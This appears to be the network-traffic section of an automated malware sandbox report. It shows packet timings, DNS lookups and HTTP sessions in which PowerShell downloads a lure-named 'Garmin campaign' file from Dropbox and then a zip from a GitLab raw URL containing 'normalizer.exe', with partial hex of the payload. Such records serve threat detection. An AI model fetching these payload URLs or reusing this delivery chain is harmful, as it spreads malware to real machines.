                                                                                                                                                                                                                Dec 12, 2024 12:59:33.314079046 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.321383953 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.321399927 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.321590900 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.321599960 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.321657896 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.329055071 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.329087973 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.329164982 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.329170942 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.329314947 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.331979990 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.335997105 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.336026907 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.336114883 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.336122990 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.336308956 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.343596935 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.343611956 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.343682051 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.343689919 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.344275951 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.350270033 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.350285053 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.350364923 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.350373983 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.350666046 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.357898951 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.357913971 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.358103037 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.358103037 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.358119965 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.360260010 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.500771999 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.500797987 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.500911951 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.500937939 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.501230001 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.507600069 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.507617950 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.507705927 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.507714033 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.507946968 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.515019894 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.515038013 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.515336037 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.515342951 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.515454054 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.522373915 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.522392035 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.522489071 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.522496939 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.522552967 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.528978109 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.528995991 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.529073954 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.529073954 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.529082060 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.529901981 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.536546946 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.536562920 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.536969900 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.536978960 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.537416935 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.543606997 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.543622971 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.543786049 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.543796062 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.543848038 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.551526070 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.551542997 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.551857948 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.551867962 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.552333117 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.692676067 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.692693949 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.692769051 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.692790985 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.692846060 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.699280024 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.699295998 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.699558973 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.699568033 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.699804068 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.706859112 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.706873894 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.706962109 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.706969976 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.707338095 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.714339018 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.714353085 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.714421988 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.714428902 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.714587927 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.722260952 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.722285032 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.722354889 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.722354889 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.722362995 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.725946903 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.728899002 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.728926897 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.729003906 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.729012012 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.729054928 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.729054928 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.735927105 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.735949039 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:33.736010075 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.382155895 CET192.168.2.51.1.1.10x1726Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 12, 2024 12:59:14.189104080 CET192.168.2.51.1.1.10x8620Standard query (0)uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.167563915 CET192.168.2.51.1.1.10xe50Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.520170927 CET1.1.1.1192.168.2.50x1726No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.520170927 CET1.1.1.1192.168.2.50x1726No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.304905891 CET1.1.1.1192.168.2.50xe50No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.549706162.125.69.184435616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-12-12 11:59:12 UTC191OUTGET /scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1 HTTP/1.1
                                                                                                                                                                                                                Host: www.dropbox.com
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-12-12 11:59:14 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                Content-Security-Policy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js [TRUNCATED]
                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                Location: https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com/cd/0/get/CgGuX16-G6p7Fe4NIKQ0zfuqQ5PKfp8QYL1Poo06WNqAqBgB1HNcr3XD0BZ6PI9jjdjdCcogzoFIPCdtvq_ByCWp26iWMg8FduJivvCua80dLzKiaYwE0lYeqFhkCVOY0RWNeZ0n5-hfSwp6PrJX2D8L/file?dl=1#
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                Set-Cookie: gvc=MzE4MzM2MDI1NTgyNjQwMDU3MzAwMjk5NDA5MDMzNTM0MDg3Nzcz; Path=/; Expires=Tue, 11 Dec 2029 11:59:13 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: t=cusxFDzBBhzoAXMITLGhMyHK; Path=/; Domain=dropbox.com; Expires=Fri, 12 Dec 2025 11:59:13 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: __Host-js_csrf=cusxFDzBBhzoAXMITLGhMyHK; Path=/; Expires=Fri, 12 Dec 2025 11:59:13 GMT; Secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: __Host-ss=DAszGMyCyE; Path=/; Expires=Fri, 12 Dec 2025 11:59:13 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 11 Dec 2029 11:59:13 GMT
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 11:59:13 GMT
                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                X-Dropbox-Request-Id: 662adc8d5c914eeab59ce362369536cf
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-12-12 11:59:14 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                Data Ascii: ...status=302-->


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                1192.168.2.565363172.65.251.784436164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-12-12 11:59:20 UTC99OUTGET /stare2/garmin/-/raw/main/fuknew1112.zip HTTP/1.1
                                                                                                                                                                                                                Host: gitlab.com
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC453INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 11:59:20 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 68976560
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                CF-Ray: 8f0d8c3b0c2041c0-EWR
                                                                                                                                                                                                                CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                Content-Disposition: attachment
                                                                                                                                                                                                                ETag: "f4f0362f6d170e29ad1750b133f00af7"
                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC2131INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC502INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4d 31 62 47 6a 79 51 73 71 4d 78 4f 36 54 51 61 62 6b 64 68 69 5a 71 5a 32 4f 4e 79 75 73 73 49 25 32 42 30 32 6a 48 68 48 4f 50 6a 39 32 6b 35 4b 56 37 35 7a 4f 4d 63 37 79 49 25 32 42 79 53 58 6d 25 32 46 73 79 68 68 57 30 45 58 32 78 57 25 32 46 70 6e 65 41 4c 46 48 58 38 50 71 50 78 47 41 52 50 44 72 69 41 55 49 45 43 53 54 43 74 6b 46 6e 45 42 68 57 66 31 76 47 41 30 49 73 62 48 30 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1bGjyQsqMxO6TQabkdhiZqZ2ONyussI%2B02jHhHOPj92k5KV75zOMc7yI%2BySXm%2FsyhhW0EX2xW%2FpneALFHX8PqPxGARPDriAUIECSTCtkFnEBhWf1vGA0IsbH0g%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1021INData Raw: 50 4b 03 04 0a 00 00 00 00 00 71 a8 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 53 63 72 69 70 74 73 2f 50 4b 03 04 14 00 00 00 08 00 c8 3d 56 58 30 70 28 4b 74 cd 00 00 9c a7 01 00 16 00 00 00 53 63 72 69 70 74 73 2f 6e 6f 72 6d 61 6c 69 7a 65 72 2e 65 78 65 ec bd 09 60 93 55 d6 30 fc 64 6b d3 8d 27 05 02 65 93 00 05 0a 05 2c 14 b5 35 a0 09 4d e4 09 a4 52 36 a9 0a da d2 05 d0 42 3b ed 13 16 05 6c 4d 3b d3 f0 18 45 47 1d 67 c6 51 c6 65 c4 d1 99 71 d4 61 53 b1 a5 d0 05 0a 14 54 2c e0 52 c5 e5 89 01 2c 2e 6d d9 fa fc e7 dc 7b 93 a6 a5 a8 ef bc df fb 7d ff f7 7e 6f da e4 dc 7d bf e7 9e 73 ef 3d e7 a6 df b1 99 d3 70 1c a7 85 af a2 70 dc 0e 8e 7e 2c dc cf 7f 3a e0 db 67 f8 ae 3e dc 9b 11 07 47 ec 50 39 0f 8e 58 b0 7c 45 89 a9 a8 b8 70 59 71 f6 4a 53
                                                                                                                                                                                                                Data Ascii: PKqKYScripts/PK=VX0p(KtScripts/normalizer.exe`U0dk'e,5MR6B;lM;EGgQeqaST,R,.m{}~o}s=pp~,:g>GP9X|EpYqJS
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: 25 90 97 40 d3 90 6a 48 f6 56 d2 1c c9 55 1a fb 69 21 b1 03 f2 9c cc f2 74 4a b5 0e 52 49 39 79 30 c7 d1 8c 62 68 46 98 cb af 21 17 2b bf dd ce e5 9b 75 7d c1 d9 a5 4b 97 be f4 e7 63 6a de df 91 f6 3b 0a f5 78 1f 52 96 3f 4d e8 99 e2 67 83 02 29 be 15 19 5a f4 c9 90 e8 ad de c5 89 4a ba f9 e3 e2 c1 fc 76 dd 0e f0 ce b7 a6 6a c4 c8 f4 c4 4f c1 b1 e4 3b bf 26 5d 3a 45 ba ec d5 44 1c ab 8b e3 2d 0e 69 af 43 ba 33 c9 21 95 80 f1 7e c1 21 9d b2 de 6d bd cb ba c4 ba 78 09 0c 55 3a 86 16 de 86 03 35 29 19 1a e1 9c 77 d1 24 1c 4d 59 f2 73 31 d0 2e de 89 e1 f3 49 19 c4 89 d6 9d 38 37 a0 c8 82 74 2c b9 01 c3 24 08 9e 82 78 93 62 9c 7a 1a e6 76 15 5f 5e 0e cd f9 2e 4e 05 ff 06 18 78 d7 60 e1 bd 0b e2 97 e3 34 ca 94 af 1d 87 7d 83 56 09 ac 52 b3 7c 16 66 70 c5 49 d7
                                                                                                                                                                                                                Data Ascii: %@jHVUi!tJRI9y0bhF!+u}Kcj;xR?Mg)ZJvjO;&]:ED-iC3!~!mxU:5)w$MYs1.I87t,$xbzv_^.Nx`4}VR|fpI
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: 8d 42 c5 49 31 ca a1 f9 44 90 da 7d 87 39 52 b2 06 08 68 dd 11 4d 12 3e 2c e7 44 04 56 ee 23 e0 5e 51 e5 94 ea 90 ae 5a 8b 13 d7 bb 26 8e df de 07 b3 8c c5 cc 9c fd 18 d9 08 09 6b 68 9c 2f 21 0e c4 90 1d 18 dc 5d ab 66 c1 a3 31 f8 30 5a 36 59 90 3e c9 b7 a5 8e 11 07 f1 db a3 d0 5d 47 dd 23 a1 cb d4 e0 31 ca f5 35 f3 38 dd 97 cc 5f 7d be cd 33 0a 3d 91 3c 32 74 04 68 a2 d7 b5 04 39 40 6e 30 c3 10 37 7c 00 f3 2b df 7d f3 48 d7 b8 7c b7 79 24 0d f4 8e 96 90 85 58 a4 6d e8 1d 48 c9 5d a7 c6 e2 41 88 53 a4 f6 3c ab 7d 9e 9e 64 69 ca 77 3f 70 cd 48 71 50 57 42 5f 68 09 02 c2 84 56 42 42 50 42 ac 17 69 73 3b 2d e6 20 4c dc cf 83 0b bf 1d fa 99 3a 46 63 6e fc 76 4d 3e 54 f0 4b 98 a0 dd d0 66 2d c5 9c 14 69 2e be bb 26 b8 ee 15 c1 60 58 1b d7 45 0b 7b b7 a6 9c 27
                                                                                                                                                                                                                Data Ascii: BI1D}9RhM>,DV#^QZ&kh/!]f10Z6Y>]G#158_}3=<2th9@n07|+}H|y$XmH]AS<}diw?pHqPWB_hVBBPBis;- L:FcnvM>TKf-i.&`XE{'
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: 54 a1 65 ec 95 97 c3 9d 1d 7b f2 17 0e 49 a6 73 c2 2a ed 4d 47 e6 7b 3f 16 14 46 d4 60 f9 dc 98 60 47 fe 35 06 78 4e a0 9c 1f f0 bd 42 bc 8f 8a 9f 21 d9 0d 63 f0 88 7c a1 13 31 21 10 fb f6 d4 9c fe ae 9b 85 c4 76 7e fb d0 9b f2 dd 17 ad c5 91 f0 7b c7 1a 6d be bb c6 84 c8 d5 dd 41 9c 3a 88 53 95 89 10 00 ca 41 d1 92 0f f4 90 39 df dc 2c d6 fa a7 02 b1 82 f8 d7 24 0f b1 71 1c ac 02 c4 c2 6f 6f 96 a3 6c 48 50 d6 aa 03 b1 22 31 96 0e 63 35 02 22 e7 b7 d7 24 56 db 52 72 e3 53 90 04 75 c6 27 b9 ff 8c 6d 72 99 b0 f0 b8 d4 b3 69 04 18 7b 39 b4 8b c5 ba b8 86 f2 f1 c9 30 89 8e 3a a5 e3 a9 ba 9b ae 83 16 5e 03 6d 20 de c7 ea 3f ba ab fe d1 ac fe 84 6d 27 f5 77 26 9e 48 e3 b7 47 f7 03 ba 8f d4 ea 3c a9 55 b5 09 56 ed be f9 ee 0b c4 ed 02 71 db 63 72 b8 f7 a8 1d 4a
                                                                                                                                                                                                                Data Ascii: Te{Is*MG{?F``G5xNB!c|1!v~{mA:SA9,$qoolHP"1c5"$VRrSu'mri{90:^m ?m'w&HG<UVqcrJ
                                                                                                                                                                                                                2024-12-12 11:59:21 UTC1369INData Raw: 0d 6e cd 49 40 b0 1f c1 16 5d 2e 7f b4 04 92 1b b7 46 6f 95 6a 9d 80 bf 97 0b 89 b2 a0 0a 47 bf 22 1b fc 64 39 35 ad 42 62 bd ef cf 24 1a f8 db a5 6a 87 59 2e 5e 6e c7 dd 6d a8 86 f9 9b d5 51 56 69 8f 5d fa ce da 7e ce 0f 08 77 9f 4d fa d1 d1 de 6a 4b fc ce 1f 89 46 f3 37 76 7e e6 77 90 3c 8e e8 42 ec d5 18 60 45 ed 2c 3b 87 74 0c 68 31 f3 e2 ae cd 7e dc ec bd 17 b0 72 a2 ec 5b ad d0 dd b7 17 e6 53 e7 4c 52 2c a4 f4 c6 5a 2b 49 83 08 ca 41 87 52 0b 1c 09 69 11 9c c3 cb 05 0f 09 73 c6 f7 29 59 42 a1 c1 63 82 0d 5e 08 03 5b 1e 73 0d f6 22 99 8d d7 41 10 f7 9c 38 93 90 f8 31 b4 3f 30 67 ed 3f f8 12 a8 9b c1 ff 8d 43 aa f3 0d ee 44 5e a4 fb 3e 80 d3 93 65 a2 9c 84 43 3a 47 f0 d0 05 a7 f4 19 0e 96 2c 1c 2c 77 e2 a8 c0 de 71 8d 14 70 1d 89 74 4a 7b 92 8f ca df
                                                                                                                                                                                                                Data Ascii: nI@].FojG"d95Bb$jY.^nmQVi]~wMjKF7v~w<B`E,;th1~r[SLR,Z+IARis)YBc^[s"A81?0g?CD^>eC:G,,wqptJ{
